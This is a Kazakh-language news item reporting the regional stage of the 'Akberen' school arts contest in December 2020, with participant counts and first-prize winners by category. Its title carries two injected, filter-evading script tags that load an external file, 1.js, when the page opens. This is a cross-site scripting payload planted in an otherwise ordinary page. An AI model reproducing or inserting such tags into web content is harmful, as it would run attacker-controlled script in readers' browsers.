VII республикалық «Ақберен» өнер байқауынның облыстық кезеңі бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.12.2020

2020 жылдың 7 желтоқсан күні жалпы білім беретін мектептердің 8-11 сынып оқушылары арасында VII республикалық «Ақберен» онлайн өнер байқауының облыстық кезеңі өтті.

Байқаудың негізгі мақсаты шығармашыл оқушылардың гуманитарлық-эстетикалық ғылымдар саласында кәсіптік қызметін таңдауға шығармашылық қабілетті, өлең жазу, тапқырлық қырын, дарынынын таныту, олардың шығармашылық қабілеттеріне  қолдау көрсетіп, ары қарай дамытуына жол ашу.

Аталған байқауға Көкшетау қаласы мен 9 ауданнан және дарынды балаларға арналған мамандандырылған мектеп-интернаттарынан барлығы 46 оқушы қатысты.

Байқау 6 номинацияда онлайн режимде өткізілді. Байқаудың қорытындысы бойынша І дәрежелі дипломмен келесі жүлдегерлер марапатталды:

- «Ұлттық аспапта өнер көрсету» номинациясы - Степногорск қаласы, «Болашақ»  №4 ДБАОММИ-ның 10-сынып оқушысы Жабай Жанбота;

- «Көркемсөз оқу» номинациясы -  Астрахан ауданы, № 4 Жалтыр орта мектебінің 10-сынып оқушысы Шарипов Бекзат;

- «Ақындар мүшәйрасы» номинациясы - Көкшетау қаласы, Абай атындағы   №3 ДБАОММИ-ның 8-сынып оқушысы Манапов Кымбат;

- «Эссе жазу» номинациясы - Ерейментау ауданы, Н.Смагулов атындағы № 2 мектеп-лицейінің 8-сынып оқушысы Бекбергенова Гүлназ;

- «Шешендік, білгірлік сайысы» номинациясы - Шортанды ауданы, Степной орта мектебінің 9-сынып оқушысы Малчыбай Айсұлу;

- «Ақындар айтысы» - Зеренді ауданы, М.Ғабдуллин атындағы қазақ орта мектебінің 9-сынып оқушысы Нұрбек Серік.

Сондай-ақ облыс бойынша ІІ дәрежелі дипломмен 10 оқушы, ІІІ дәрежелі дипломмен 15 оқушы марапатталды.

І дәрежелі диплом алған жүлдегерлеріміз байқаудың республикалық кезеңіне жолдама алды. Оларға сәттілік тілейміз!

 

Просмотров: 513


Пікір қосу



Деректерді қолтаңбаға қосу